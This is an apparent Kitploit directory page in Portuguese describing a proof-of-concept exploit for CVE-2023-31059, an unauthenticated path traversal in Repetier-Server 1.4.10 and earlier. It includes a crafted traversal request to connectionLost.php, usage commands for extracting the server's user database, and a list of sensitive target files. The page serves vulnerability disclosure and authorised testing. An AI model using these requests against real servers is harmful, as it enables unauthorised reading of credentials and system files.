Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal — Exploit de prova de conceito para CVE-2023-31059, um path traversal não autenticado no Repetier-Server ≤1.4.10, permitindo leitura arbitrária de arquivos através de requisições HTTP manipuladas. | Kitploit
Ferramentas/GitHubGitHub/mbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubmbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal

CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal

Exploit de prova de conceito para CVE-2023-31059, um path traversal não autenticado no Repetier-Server ≤1.4.10, permitindo leitura arbitrária de arquivos através de requisições HTTP manipuladas.

Ver Repositório
1há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Repetier-Server <= 1.4.10

Autor: Mohammed Idrees Banyamer
Função: Pesquisador de Segurança
País: Jordânia 🇯🇴


Visão Geral

Exploit de prova de conceito para uma vulnerabilidade de path traversal remoto / LFI não autenticado no Repetier‑Server ≤ 1.4.10.

A vulnerabilidade permite leitura arbitrária de arquivos através de sequências ..%5c manipuladas no endpoint connectionLost.php.


Detalhes da Vulnerabilidade

CampoValor
ProdutoRepetier‑Server
Afetado≤ 1.4.10
CVECVE‑2023‑31059
TipoPath Traversal / LFI
AutenticaçãoNenhuma
VetorRede
ImpactoLeitura Arbitrária de Arquivos
CVSS9.8 Crítico

Fluxo de Ataque do PoC

root@kitploit:~
flowchart LR
    A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
    B --> C[base/connectionLost.php]
    C -->|Unsanitized file parameter| D[Windows Filesystem]
    D --> E[Sensitive File]
    E --> B
    B -->|File contents in HTTP response| A

Exemplo de Exploração

root@kitploit:~
GET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344

Uso

root@kitploit:~
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test

# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
  --file "ProgramData\\Repetier-Server\\database\\user.sql" \
  --depth 20

Requisitos

root@kitploit:~
pip install requests

Alvos de Alto Valor

root@kitploit:~
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts

Aviso Legal

Este PoC é fornecido apenas para fins educacionais e de teste de segurança autorizado. Use apenas em sistemas que você possui ou para os quais tenha permissão explícita para testar.


Contato

GitHub: https://github.com/mbanyamer

Baixar ferramenta